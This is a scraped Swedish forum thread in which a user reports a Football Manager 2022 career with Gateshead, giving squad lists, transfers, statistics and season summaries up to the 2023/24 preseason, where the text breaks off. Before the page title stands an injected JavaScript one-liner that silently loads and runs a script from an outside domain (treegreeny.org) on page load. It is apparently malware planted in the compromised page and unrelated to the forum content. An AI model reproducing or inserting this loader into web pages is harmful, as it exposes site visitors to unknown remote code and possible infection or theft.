;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM22] Styrkeprovet – Rapporter – FMSweden Forum
Meny Stäng

[FM22] Styrkeprovet
 
Share:
Notifications
Clear all

[FM22] Styrkeprovet

53 Inlägg
6 Users
80 Likes
2,335 Visningar
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  

Del 0, Säsong 0, Avsnitt 0 – Början

FM22 – en save. Ja vad ska man säga? Det är dags att ge den gamla favoritserien ännu ett försök, Jag har funderat lite på hur jag ska spela och rapportera, men jag kom fram till att börja i Englands lägsta division, …som vanligt.... Vidare ska jag bygga upp det starkaste laget i serien och vad passar då bättre än att börja med det laget som har lägst genomsnittlig styrka vid spelstart. Så varje säsong kommer bestå av målen: Starkaste laget, topp 5 i allmän fysik och satsa på egna produkter. Jag börjar såklart så dålig som möjligt.


   
TommyE reacted
Citera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2021/22
Vanarama National League North
Del 1, Säsong 1, Avsnitt 0 – En första anblick

Lagen att välja mellan blev i Vanarama National League North: Gateshead på 7,35 i styrka och Vanarama National League South: Slough Town på 7,28, så efter lite eftertanke så blev det Gateshead. Jag kommer satsa på att spela tråkig defensiv fotboll, med stort fokus på fasta situationer. För att nå våra mål kommer det i första hand värvas in fysmonster, en hörn och frisparksspecialist och ett par spelare som kan fixa fram frisparkarna, vidare kommer jag få lägga tid på både träningsprogram, och värva in bra fystränare, och fasta situationstaktiker, inget jag lagt tid på tidigare alls. Kul!

Gateshead är en rätt gammal, men omstartad, klubb som ännu ej nått några större framgångar, man har dock, för nivån, goda faciliteter samt en hälsosam bankbalans. Till och med professionell status, vilket kommer underlätta hårdträningen. Vi ligger också bara en kvart bort från Newcastle och förhoppningsvis kan vi bli folkets lag, när de valt pengarna. Även närheten till Sunderland i League 1 är noterbar.

Startstatistik
Lagstyrka : 7,35
Lagstyrka i division: 22'a
Lag övrig fysik: 10,03
Lag övrig fysik i division: 9,14'de
Bankbalans: 4,1 Mkr


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2021/22
Vanarama National League North
Del 1, Säsong 1, Avsnitt 1 – Försäsongen

Det första vi gjorde var att försöka få tag i en fystränare och starta min första tränarutbildning. Efter fått in en fystränare lyckades jag flörta till mig att få ha en till och med honom så hade vi divisionens bästa fystränare. Därefter lades ett träningsprogram upp, vi såg över spelartruppen och efter att ha fastnat vid en 4-3-3 uppställning så insågs att vår nya identitet gjorde att målvakt och innermittfältare hade högsta prioritet. Men redan första dagen på jobbet gjordes en önskelista på 33-spelare, även om det knappt fanns plats till en i lönebudgeten.

Våra träningsmatcher gick hyfsat, vi slutade på fem vinster och två förluster, sex av matcherna var mot betydligt sämre motstånd dock. Det var bara matchen mot Sunderland, som jag själv anordnade, där vi mötte ett lag från en högre division, nästa år kommer jag själv boka alla matcherna. Taktiken verkar fungera någorlunda, dock verkar det som vår vänsterback inte riktigt är med.

In:
DM/MC Toby Stephens, 18år (Lån) Yeovil
 DC Ollie Younger, 21år (Lån) Sunderland
 GK Max Harris, 21år (Lån) Cheltenham
Kommentar: Tre unga inlånade spelare, på helt gratis säsongslån, alla tre har goda chanser på mycket speltid dessutom.

Ut:
 GK Jacob Chapman (Avslutat Lån) Huddersfield
Kommentar: Chapman kan ha varit ett misstag att göra sig av med, duktig målvakt men satt på högst lönekostnad i klubben.

Startelva:
Målvakter: (Land, Namn, Ålder, Styrka, Övrig Fysik, Moderklubb)
 Sam Guthrie, 25år, 8, 8.57, Huddersfield
 Adam Cameron, 20år, 4, 6.71, Sunderland
 Max Harris, 21år, 4, 8.14, Hereford
Kommentar: Lagets svagaste del, både styrkemässigt och fotbollsmässigt, och här har jag bara gjort det sämre, men jag hoppas på att ytterligare en spelare är på väg in. Tills dess är Harris försteman, och Cameron tvåa. Guthrie blir jag gärna av med.

Backlinjen: 
 Ollie Younger, 21år, 12, 9.29, Burnley
 Ryan Bolton, 19år, 5, 10, Gateshead
 Alex Nicholson, 27år, 10, 9.71, Newcastle
 Robbie Tinkler, 25år, 10, 11.71, Middlesbrough
 Matty Jacob, 20år, 9, 9.71, Hull
 Kieren Aplin, 21år, 5, 8.86, Newcastle
 Elliot Forbes, 22år, 8, 10.71, Gateshead
Kommentar: Tinkler och Nicholson, kapten och vice, två spelare som personifierar, vad jag vill ha för spelare, tillsammans med Jacob och Younger så har vi våra tänkta fyra. Men klubbfostrade Forbes kommer absolut vara med i diskussionen. Mycket bra betyg på de fem bästa här.

Mittfältet: 
 Jack Hunter, 23år, 0, 0, 0, 11, 10.43, Newcastle
 Owen Bailey, 22år, 0, 0, 0, 5, 10.29, Newcastle
 Toby Stephens, 18år, 0, 0, 0, 9, 10.86, Yeovil
 Danny Greenfield, 20år, 0, 0, 0, 7, 10.71, Barnsley
 Dan Ward, 23år, 0, 0, 0, 8, 10.86, Newcastle
 Greg Olley, 25år, 0, 0, 0, 7, 10.43, Newcastle
Kommentar: Olley är bäst bland dessa herrarna och kommer lägga beslag på en av de tre platserna, i övrigt är det full kamp om platserna, även om Ward kanske får ses som lite svagare än de andra. Ganska mediokert, men bör hålla för den här divisionen.

Anfall/yttrar: 
 Luke Williams, 28år, 0, 0, 0, 7, 9.71, Middlesbrough
 Cedwyn Scott, 22år, 0, 0, 0, 10, 11, Huddersfield
 Adam Campbell, 26år, 0, 0, 0, 5, 9.71, Newcastle
 Macaulay Langstaff, 24år, 0, 0, 0, 6, 10.29, Stockton
 Paul Blackett, 23år, 0, 0, 0, 7, 10, Newcastle
 Nelson Ogbewe, 19år, 0, 0, 0, 7, 9.57, Gateshead
Kommentar: De båda yttrarna Williams och Campbell kommer stå för mycket av lagets underhållning, Scott är targetmannen emellan dem. Så länge de håller sig hela kan det här bli roligt, i övrigt är det rätt tunt här.

Klubbstatistik
Lagstyrka : 7,58(+0,23)
Lagstyrkaposition i division: 21'a(+1)
Lag övrig fysik: 10,01(-0,02)
Lag övrig fysik i division: 9,57'de(-0,43)
Bankbalans: 3,5(-0,6) Mkr


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2021/22
Vanarama National League North
Del 1, Säsong 1, Avsnitt 2 – Första tredjedelen

Vi började säsongen med en stabil 2-0 vinst borta mot Leamington efter bland annat ha nickat in en frispark, allt enligt plan alltså. Vi fortsatte spela bra fotboll och även om vi släppte in betydligt mer mål än vad jag tycker vi borde, så klättrade vi upp till en femte plats efter åtta omgångar. York verkade dock redan sprungit ifrån och hade ett försprång på just åtta poäng. FA cupen hade vi vunnit två matcher innan vi nu lottats mot Halifax från divisionen över.

Mycket riktigt fick vi nöja oss i fjärde kvalomgången i den anrika cupen. Vårt spel blev dock än bättre, särskiljt defensiven höjde sig nämnbart. Första sju matcherna så släppte vi in tio mål och de följande sju bara fyra. Matcherna mot Fylde och York var speciellt trevliga då de då låg tvåa och etta. Tabellmässigt ligger vi bra till även om det är rätt tight än så länge, förutom just York då som ligger lika många poäng före tvåan, som andraplacerade Telford ligger före elfteplatsen.

In:
 GK Rhys Taylor, 31år, 0kr, Bradford PA
 D(LC) Jordan Boon, 20år, 0kr, Spennymoor
 ST Eddie Brown, 20år, 0kr, Bolton
 D(LC) Ryan Wombwell, 18år, Uppflyttad U18
 M(C) Connor Pani, 18år, Uppflyttad U18
Kommentar: Taylor kommer in för att ta över kassvaktandet, han har allt jag söker i en målvakt. Stark, bra i luften, utsparkar och dessutom bra reflexer. Kan jag bara hitta en lovande adept han kan lära upp så är jag nöjd. Boon kommer in för att vara en mer defensiv vänsterback än vi haft tidigare. Brown kommer in för att öka konkurrensen på topp. Wombwell och Pani blev uppflyttade både på grund av skador och att de båda är de båda är väldigt lovande.

Ut:
 D/WB(L) Matty Jacob, 20år, 3SM, 6.57AVR (Avslutat Lån) Hull
Kommentar: Tyvärr kommer han inte upp i den nivån som förväntas av någon som sitter på den löneposten han gjorde, så valde att göra rum någon vi kan se en längre framtid i.


   
TommyE reacted
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 3 år sedan
Inlägg: 193
 

Alltid kul med lite misär i dom lägre engelska ligorna 🙂 Gateshead är ju ett lag som absolut brukar ha kapacitet för att vara ett topplag i National League åtminstone. Jag kommer följa med på din resa här.


   
Chrahl reacted
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  
Postad av: @trashbag

Alltid kul med lite misär i dom lägre engelska ligorna 🙂 Gateshead är ju ett lag som absolut brukar ha kapacitet för att vara ett topplag i National League åtminstone. Jag kommer följa med på din resa här.

Tack så mycket, jo jag håller med. Men de har ju såklart gjort misstaget att anställa mig 🙂 


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2021/22
Vanarama National League North
Del 1, Säsong 1, Avsnitt 3 – Andra tredjedelen

Vi fortsatte spela ett stabilt spel, även om stundtals tappade takten, dubbla vinster mot våra värsta rivaler Blyth på bara en vecka var glädjande. Tyvärr så firade vi det genom att låta Hereford ge oss vår största förlust hittills. Vid första anblick av det kommande ungdomsintaget verkade det som att offensiva mittfältare var det enda vi kunde hoppas på.

Det stora utropstecknet just nu har varit Connor Pani, 18åringen har utvecklats enormt, och har på bara några månader gått från en lovande talang till en av lagets absolut bästa spelare. Vi har fortsatt spela som ett topplag, vi fick till och med tre vinster i rad nu på slutet, och dessutom utan att släppa in ett enda mål, även om vi ligger en bra bit över mitt mål på ett snitt på ett insläppt mål per match.

In:
 D/WB(L) Kieran Aplin, 21år (Avslutat Lån) Hebburn
 ST Nelson Ogbewe, 19år, (Avslutat Lån) Hebburn
Kommentar: Två spelare som vi inte kunde övertala att fortsätta vara utlånade, men som inte kommer ingå i den här säsongens planer.


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2021/22
Vanarama National League North
Del 1, Säsong 1, Avsnitt 4 – Tredje tredjedelen

Det började nu bli ytterst tydligt att även om vi för det mesta plockade full pott från lag som var sämre än oss så hade vi det svårt mot lag som utmanade i toppen. Gloucester hade tagit över taktpinnen och verkade omöjliga att besegra, men att vi låg på kvalplats, med fyra poäng tillgodo, när bara sju matcher återstod, var väldigt glädjande. Spådomarna om vårt ungdomsintag var totalt felaktiga, två försvarare var som fick mig att glädjas mest.

April var vår bästa månad under hela säsongen, obesegrade trots sju matcher och två 4-0 vinster, med det facitet så var det inte konstigt att vi kvalificerade oss för kvalet med två matcher kvar på säsongen. Inte blev jag utsedd till månadens manager för det dock, men nu gäller det att ladda om för ett kval som inleds mot Kidderminster Harriers.


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2021/22
Vanarama National League North
Del 1, Säsong 1, Avsnitt 5 – Kvalet

Matchen mot Kidderminster inleddes med den mest intetsägande första halvleken på länge, vi visade ingenting framåt och inte dem heller. Direkt efter vilan så drog de dock upp takten och stänkte in en volley på ett inlägg. Tre minuter senare så slog vår kapten Tinkler ett inlägg som vi nickade in, lika, vilket stod sig matchen ut. I övertiden så var det just vår kapten som visade den där lilla extra viljan, och med ett fantastisk långskott tog vi ledningen, en ledning vi kunde utöka och sedermera också vinna matchen.

Vi stod nu i nästa omgång mot Darlington och tyvärr gjorde de ett tidigt mål efter vi slarvat i uppspelsfasen. Snart stod det även 2-0, vilket första halvlek slutade med. I andra hämtade vi upp spelet och var bra med i matchen, tyvärr blev det inga fler mål för någon av oss och drömmen om uppflyttning var över. Uppflyttningen säkrades sedan av Fylde.


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2021/22
Vanarama National League North
Del 1, Säsong 1, Avsnitt 6 – Säsongssummering

Vi uppnådde styrelsens mål om att nå uppflyttningskval, vilket var det viktigaste. I FA cupen fick vi ge oss tidigare än vi önskade efter en tuff lottning. Däremot FA Trophy är ett sorgligt kapitel då det tydligen finns en bugg här, de har bytt namnen på omgångarna i själva cupen men inte i den delen av spelet som ger förväntningarna. Så jag trodde kravet var två omgångar lägre än var det verkligen var så jag spelade med så mycket rotation jag kunde.

Nu väntar ett antagligen ganska hektiskt transferfönster, då det finns en hel del spelare på utgående kontrakt, och även om ekonomin verkar rätt kaosartad för tillfället så hoppas jag få ihop en trupp som kan utmana i toppen nästa år igen. Som ett extra glädjande poäng så hade vi inte en enda avstängning på hela säsongen, med tre gula som mest insamlat av en spelare.

Vanarama National League North: Sexa
FA Cupen: Fjärde kvalomgången
FA Trophy: Tredje omgången

Årets spelare: Robbie Tinkler: Kaptenen har varit otroligt stabil över hela säsongen, tror inte han gjort en enda dålig match.
Årets värvning: Rhys Taylor: Han höll nollan 18 gånger i år och släppte bara in 40 mål, väldigt stabilt av åldermannen i truppen.
Årets Gatesheadare: Connor Pani: Vinner per automatik som den enda egna produkten, men han är värd väl utmärkelsen och skulle klara av divisionen över oss utan problem.
Årets match: 2-1 vinsten borta mot Fylde i oktober: Strålande match mot toppmotstånd, som fick mig att tro på säsongen på ett helt annat sätt.

Lag vi vill vara bättre än:
Newcastle: Premier League 14:e
Middlesbrough: Championship 14:e
Sunderland: League One 4:e
Hartlepool: League Two 18:e
Darlington: National League North 3:e
York: National League North 4:e
Spennymoor: National League North 13:e
Blyth: National League North 22:e (Nedflyttade)


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2022/23
Vanarama National League North
Del 1, Säsong 2, Avsnitt 1 – Förssäsong

Vi avslutade förra säsongen så skrev vi en önskelista, vi räknade med att kunna frigöra 50-60 tusen kronor, i veckolig budget, och vi lyckades värva in det mesta vi önskade och kunde till och med göra lite extra dyra värvningar på slutet. Vi bytte även ut stora delar av tränarstaben.

Under sommaren så gick vi från att vara tredjetippade till att vara tippade att vinna ligan, något jag inte skulle tippa själv men, vi har definitivt blivit bättre så jag hoppas att vi placerar oss högre i år. Det enda som vi ännu inte hittat är ett par innermittfältare.

In:
GK Bert White, 20år, 0kr, Ipswich
 GK Will Brown, 20år, 0kr, Newcastle
 DC Ollie Younger, 22år, 47SM, 5GM, 7.12AVR, 0kr, Sunderland
 D/MC Tawanda Mutoti, 20år, Lån, Maidstone
 D/M/AMR Joel Connolly, 19år, 0kr, Burnley
 DC/DM Hayden Lindley, 19år, 0kr, Aston Villa
 ST Faisu Sangaré, 19år, 0kr, Wolves
 AMRL Zaid Al-Hussaini, 22år, 0kr, Crawley
Kommentar: White och Brown kommer in som unga lovande målvakter, vem som blir andraval är inte säkert, Mutoti kommer in för att främst utmana om en mittbacksplats. Sangaré kommer spela för en plats i startelvan. Younger är jag mycket nöjd med att fått in efter hans lysande lån förra säsongen. Al-Hussaini kommer in som backup för bägge ytterpositionerna.

Ut:
 MRC/AMC Greg Olley, 26år, 42SM, 2GM, 6.97AVR, 0kr, Bradford City
 M/AML/ST Cedwyn Scott, 23år, 47SM, 16GM, 6.84AVR, Fri transfer
 D/DM/MC Jack Hunter, 24år, 38SM, 3GM, 6.96AVR, Fri transfer
 AMRL/ST Macaulay Langstaff, 25år, 42SM, 4GM, 6.77AVR, Fri transfer
 D/MC Owen Bailey, 23år, 27SM, 3GM, 7.04AVR, 0kr, Torquay United
 GK Max Harris, 22år, 7SM, 4HN, 1IM/M, (Avslutat Lån), Cheltenham
ST Paul Blackett, 24år, 6SM, 6.65AVR, Fri transfer
 MC Dan Ward, 24år, 2SM, 6.8AVR, 0kr, Shelbourne
 GK Sam Guthrie, 26år, Fri transfer
 GK Adam Cameron, 21år, Fri transfer
 D/WR Ryan Bolton, 20år, Fri transfer
 D/WL Kieren Aplin, 22år, Fri transfer
Kommentar: Olley och Scott är de två spelarna som försvunnit ur startelvan och båda två för att de ville ha alltför mycket pengar mot vad de var värda, särskilt Olley kommer vara svår att ersätta. Hunter, Langstaff och Bailey är alla kapabla, men har mest hållit till på bänken och vill ha en aning för hög lön och mer speltid. I övrigt är det ett gäng spelare som inte ingår i mina planer.

Startelva:
Målvakter: (Land, Namn, Ålder, SM, HN, IM/M, Sty, ÖF, Moderklubb)
 Rhys Taylor, 32år, 43, 18, 0.93, 12, 9.43, Chelsea
 Will Brown, 20år, 0, 0, 0, 4, 8.57, Newcastle
 Bert White, 20år, 0, 0, 0, 7, 7.57, AFC Wimbledon
Kommentar: Här hade vi tänkt att vi hade det ganska bra med Taylor som förstaval, och två unga talanger, tyvärr så skadade Taylor höften innan säsongsstarten och blir borta till nyår. I hans frånfälle så får vi se vem som kliver fram. Klar försämring

Backlinjen: (Land, Namn, Ålder, SM, GM, SB, Sty, ÖF, Moderklubb)
 Ollie Younger, 22år, 47, 5, 7.12, 13(+1), 10.29(+1), Burnley
 Jordan Boon, 21år, 38, 0, 6.8, 9, 9.43, Bolton
 Ryan Wombwell, 19år, 19, 0, 6.79, 10, 10.71, Sunderland
 Joel Connolly, 19år, 0, 0, 0, 8, 10.14, Burnley
 Alex Nicholson, 28år, 43, 0, 7.02, 10, 9.71, Newcastle
 Robbie Tinkler, 26år, 45, 2, 7.07, 10, 11.71, Middlesbrough
 Tawanda Mutoti, 20år, 0, 0, 0, 11, 10, Nottm Forest
 Elliot Forbes, 23år, 22, 0, 6.86, 8, 10.86(+0.15), Gateshead
Kommentar: Vi har kvar de fyra som spelade mest förra året, Younger, Tinkler, Nicholson och Boon. Wombwell var med bra också förra året, Mutoti spetsar till det. Younger är en av lagets bästa spelare nu, och även om Forbes förväntas vara borta förbi nyår med en bruten fot så ger jag den här lagdelen ett plus mot förra året. Mutoti är en aktiv landslagsspelare för Zimbabwe.

Mittfältet: (Land, Namn, Ålder, SM, GM, SB, Sty, ÖF, Moderklubb)
 Hayden Lindley, 19år, 0, 0, 0, 8, 11, Man City
 Toby Stephens, 19år, 35, 1, 6.98, 11(+2), 11.29(+0.43), Yeovil
 Danny Greenfield, 21år, 11, 0, 6.67, 7, 10.71, Barnsley
 Connor Pani, 18år, 26, 4, 7.16, 9, 11.29, Gateshead
Kommentar: Pani är lagets stora stjärna och jag tvivlar på att han blir kvar i klubben på sikt, men vi kan alltid drömma. Lindley och Stephens är defensiva bra alternativ, men den sämre Greenfield lär få spela då vi behöver offensivare krafter i taktiken. Något sämre nivå här än förra året, men bredden är det stora problemet. Men det finns plats i budgeten för förstärkningar här.

Anfall/yttrar: (Land, Namn, Ålder, SM, GM, SB, Sty, ÖF, Moderklubb)
 Luke Williams, 29år, 40, 12, 7.32, 7, 9.71, Middlesbrough
 Zaid Al-Hussaini, 22år, 0, 0, 0, 7, 10.29, Derby
 Adam Campbell, 27år, 47, 10, 6.72, 5, 9.71, Newcastle
 Faisu Sangaré, 19år, 0, 0, 0, 13, 8.57, Oldham
 Eddie Brown, 21år, 36, 5, 6.66, 12, 10.43, Bolton
 Nelson Ogbewe, 20år, 0, 0, 0, 8(+1), 10.29(+0.72), Gateshead
Kommentar: Yttrarna Williams och Campbell startar även i år och bakom sig är Al-Hussaini än bättre backup än vad vi hade förra året. Längst fram har vi tre unga anfallare och jag hoppas någon av dem kliver fram och tar vara på chansen det här är för dem. Något svagare här.

Klubbstatistik
Lagstyrka : 8,82(+1,24)
Lagstyrka i division: 4'a(+17)
Lag övrig fysik: 10,08(+0,07)
Lag övrig fysik i division: 8,29(+1,28)
Bankbalans: 16,5(-3500) Kkr
Omsättning: 11,25 Mkr


   
TommyE reacted
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2022/23
Vanarama National League North
Del 1, Säsong 2, Avsnitt 2 – Första tredjedelen

Vi startade med att vinna att gå obesegrade första sju matcherna och gå upp i ledning, vi mötte även nyligen uppflyttade South Shields, som tydligen håller oss som stora rivaler, något vi själva inte gör. Men även dem avfärdade vi utan större problem, trots en hop skador. Vi såg också till att skriva ett nytt kontrakt med Pani, och vi lyckades övertala honom hela vägen till 2026.

Vi rullade på bra på efter vår förlust också, men tyvärr så var det Spennymoor som tog vara på chansen och tog över förstaplatsen. De är fortfarande obesegrade, och vi ska vara glada att vi lyckades få med oss ett likaresultat mot dem. Vi däremot har ytterligare en förlust och snavade därför än en bit längre bort från titeln.

In:
 DL/WRL/M/AMRL Ellis Taylor, 19år, Lån, Sunderland
 DC Jamie Grimes, 31år, 0kr, Chesterfield
Kommentar: Taylor kommer in på ett snabbt lån då vi fick tre av fyra, som är kapabla till att spela som yttrar på mer än månadslånga skador, på mindre än en vecka. Han är absolut inget speciellt men bör kunna fylla upp. Grimes kommer in som reserv på ett säsongslångt kontrakt, tyvärr åkte han ganska omgående på en tvåmånaders ljumskskada.

Ut:
 DRC/WR/DM Robbie Tinkler, 26år, 50(+5), 2, 7.01(-0,06), 120Kkr, Gillingham
Kommentar: Vi ville ju såklart inte tappa vår kapten, men transfern kan mycket väl stiga till 180K och att neka någon att gå till en klubb tre divisioner upp, när de är villiga att betala en resonabel summa, hade varit värre i mitt tycke.


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2022/23
Vanarama National League North
Del 1, Säsong 2, Avsnitt 3 – Andra tredjedelen

Spennymoor förlorade sin första match, vilket vi såklart följde upp med en 0-4 förlust, sedan ställdes vi faktiskt mot Spennymoor i FA Trophy i en match vi gärna ville vinna, bara för att kunna skryta om det. Matchen blev rätt tät, hela vägen fram till andra övertidsperioden, där vi stod för inte mindre än tre mål. Tyvärr fick vi ett större bakslag då även Pani skadade sig, vår tänkta ersättare fick jag en smäll på näsan för. Tydligen kostar det 240Kkr att få ett nekat arbetstillstånd, kul.

Vi tryckte dock på och har nu lyckats vinna tolv matcher i rad, och tio i rad höll vi nollan, och seglade såklart upp i toppen. Mycket var Rhys Taylor förtjänst, han hade återvänt till buren från sin skada så vi var något oroliga när han blev borta ett par veckor igen. Fast vi höll ut även utan honom och har nu tagit ordentligt tag i toppen.

Ut:
 DL/WRL/M/AMRL Ellis Taylor, 19år, 13SM, 2GM, 6.63AVR Avslutat lån, Sunderland
Kommentar: Det blev ingen lång visit, men när skadorna lättade fanns det ingen större anledning att behålla honom.


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2022/23
Vanarama National League North
Del 1, Säsong 2, Avsnitt 4 – Tredje tredjedelen

Vi hade chansen att förankra vårt titelhopp hemma mot Spennymoor, och trots att vi till slut släppte in ett mål så vann vi ändå med 3-1 och hade nu en trettonpoängsledning med bara fjorton matcher kvar på säsongen. Jag började också tro att vi mycket väl skulle kunna bräcka 100-poängsgränsen, Alfreton ett par matcher senare fick vi vårt första poängtapp på länge då ingen av oss lyckades göra mål. Chorley var laget som lyckades bryta vår otroliga svit på hela arton ligamatcher utan förlust, varav bara en oavgjord.

Vårt ungdomsintag var i år fyllt av lovande yttrar, varav en är riktigt bra. Varav en 15-åring som vi flyttade upp till A-truppen direkt, inte för spela massa matcher, men för att få ett par inhopp när vi nu nästan var helt klara ligasegrare. Fast värst så säkra var vi inte, två förluster i rad varav en var en total förnedring med 0-5, så hade vi bara fyra poängs försprång. Vi vann sedan en match där våra två talanger Pani och Frame båda gjorde varsitt mål, och i nästsista matchen så lyckades vi säkra ligatiteln. Kvalet vanns av Alfreton, vilket måste varit otroligt surt för Spennymoor på över 100 poäng.

In:
 AMRLC Marc Frame, 15år, Uppflyttad U18
Kommentar: Väldigt lovande offensiv mittfältare, kvick och bra teknik, vi hoppas på att han kan nå sin potential. Tvekade inte en sekund innan jag gav honom nr 9.


   
TommyE, Kristijan and raca14 reacted
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2022/23
Vanarama National League North
Del 1, Säsong 2, Avsnitt 5 – Säsongssummering

Vi gjorde en minst sagt fantastisk säsong, och vårat minst sagt kliniska försvar kan man inte hylla tillräckligt, och det som gör det hela ännu bättre, och minst sagt bragdartat var att under säsongen så spelade våra tre målvakter exakt 17 matcher var och ändå släppte vi in minst mål. Vi spelade minst oavgjorda matcher i ligan, vilket antagligen var det som gjorde att vi tog hem segern.

Inför nästa säsong står jag ganska ambivalent, de flesta spelarna vill jag ge chansen men jag är väldigt osäker på om de håller, vi hade ju inte mycket inflytande i de bägge matcherna vi spelade mot Notts County, (i de två olika cuperna), som visserligen slutade trea i divisionen över oss. Prio ett får väl bli att antingen förlänga eller ersätta de bägge inlånade spelarna som gjort 90 framträdanden ihop i år.

Vanarama National League North: Etta(+5) (Uppflyttade)
FA Cupen: Fjärde kvalomgången
FA Trophy: Tredje omgången

Årets spelare: Luke Williams: Yttern som varit drivande, han gjorde flest mål, flest assist, vann flest matchens spelare, högst snittbetyg, så att han är årets spelare råder det inga tvivel om.
Årets värvning: Hayden Lindley: Lindley har varit oerhört viktig som defensiv mittfältare i år, och han känns oerhört kapabel att fortsätta spela för oss även nästa år.
Årets Gatesheadare: Connor Pani: För andra året i rad så plockar 19-åringen hem det, och om sanningen ska fram så har han utvecklats vidare och han närmar sig att vara lagets stora stjärna.
Årets match: 2-1 vinsten borta mot Braintree i april: Det kändes som om vi var på väg att sumpa ligasegern, men trots dåligt spel så kunde vi vinna matchen tack vare Frame's första mål.

Lag vi vill vara bättre än:
Newcastle: Premier League 8:e(+6)
Middlesbrough: Championship 20:e(-6)
Sunderland: League One 10:e(-6)
Hartlepool: League Two 16:e(+2)
Spennymoor: National League North 2:a(+11)
York: National League North 10:e(-6)
South Shields: National League North 13:e
Darlington: National League North 14:e(-11)
Blyth: Evo-Stik League Premier Division ?


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2023/24
Vanarama National League
Del 1, Säsong 3, Avsnitt 1 – Försäsongen

Många spelare har scoutats, många spelare har erbjudits provspel, många spelare har det inletts kontraktsförhandlingar med, ett fåtal spelare har skrivit på. Dessa herrar är alla unga, även om det vid dagens datum verkar som att även en något äldre mittfältare kommer att ansluta. Mitt stora problem är att jag inte vill värva in spelare på högre lön än vad som någon spelare i nuläget har. Om sanningen ska fram så har jag heller inte hittat någon spelare som är värd 50% högre lön än vår kapten heller.

Styrelsen önskar såklart att vi ska hålla oss kvar, något som både media och jag tror ska vara möjligt. Vi har utökat antalet tränare och har även gett Taylor uppgiften att coacha U18-laget. Vi har 40% av lönebudgeten outnyttjad, vilket är ett bra läge, då vi har 14 spelare på utgående kontrakt, även om jag räknar med att förlänga med några av dem, men vi har möjligheten att värva ersättningarna i förväg. Ser mycket fram emot att spela i Vanarama National League även om det är en betydligt mer fysisk liga, något som vi gillar.

In:
 DM/MC George Abbott, 17år, 0kr, Tottenham
 DC Tyler Fredricson, 18år, 0kr, Man Utd
 ST Junior Dixon, 18år, 0kr, Crystal Palace
 DL/WRL/M/AMRL Ellis Taylor, 19år, Lån, Sunderland Ellis Taylor, 20år, 13SM, 2GM, 6.63AVR, Lån, Sunderland
 D/W/MR Sky Sinclair, 20år, Lån, Blackpool
 GK Prince Adegoke, 19år, 0kr, Chelsea
 DC Harvey Cullinan, 20år, 0kr, Sheffield United
Kommentar: Vi har fyllt på truppen med fem unga spelare, alla med god chans på att spela många matcher i år, vi tog även två lån mestadels för breddens skull. Ska bli intressant om Taylor stannar längre den här gången.

Ut:
 D/MC Tawanda Mutoti, 21år, 46SM, 1GM, 6.89AVR, Avslutat lån, Maidstone United
 DC/MC Elliot Forbes, 24år, 30SM, 6.9AVR, 10Kkr, Maidstone United
 DC Jamie Grimes, 32år, 6SM, 6.7AVR, Fri transfer
 ST Nelson Ogbewe, 21år, 2SM, 6.6AVR, Gateshead
Kommentar: Mutoti är det stora tappet i år, och jag skulle vilja lova att tomrummet han lämnar bakom sig kommer vara svårt för oss att fylla. De övriga tre har väl aldrig setts som mer än utfyllnadsspelare.

Startelva:
Målvakter: (Land, Namn, Ålder, SM, HN, IM/M, Sty, ÖF, Moderklubb)
 Rhys Taylor, 33år, 60, 30, 0.87, 8(-4), 8.29(-1.14), Chelsea
 Will Brown, 21år, 17, 9, 0.82, 4, 8.57, Newcastle
 Bert White, 21år, 17, 7, 1.12, 7, 7.86(+0.29), AFC Wimbledon
 Prince Adegoke, 19år, 0, 0, 0, 14, 10.86, Chelsea
Kommentar: Förra året hade vi tre målvakter som gjorde exakt 17 matcher vardera, tyvärr har skadorna klart försämrat Taylor, som bara skrev under ett nytt ettårskontrakt på sista dagen av sitt gamla, han är nu även manager för U18. Nye Adegoke får ses som troliga förstavalet, vilket skulle ge oss en liten trevlig Chelsea-dynasti i buren.

Backlinjen: (Land, Namn, Ålder, SM, GM, SB, Sty, ÖF, Moderklubb)
 Ollie Younger, 23år, 98, 9, 7.16, 13, 10.14(-0.15), Burnley
 Harvey Cullinan, 20år, 0, 0, 0, 10, 10.57, N'market Celtic
 Tyler Fredricson, 18år, 0, 0, 0, 10, 11.14, Man Utd
 Jordan Boon, 22år, 71, 0, 6.86, 9, 9.43, Bolton
 Ryan Wombwell, 20år, 47, 0, 6.88, 11(+1), 11.86(+1.15), Sunderland
 Joel Connolly, 20år, 10, 0, 6.76, 8, 10.14, Burnley
 Sky Sinclair, 20år, 0, 0, 0, 8, 10.71, Blackpool
 Alex Nicholson, 29år, 92, 2, 7, 10, 9.71, Newcastle
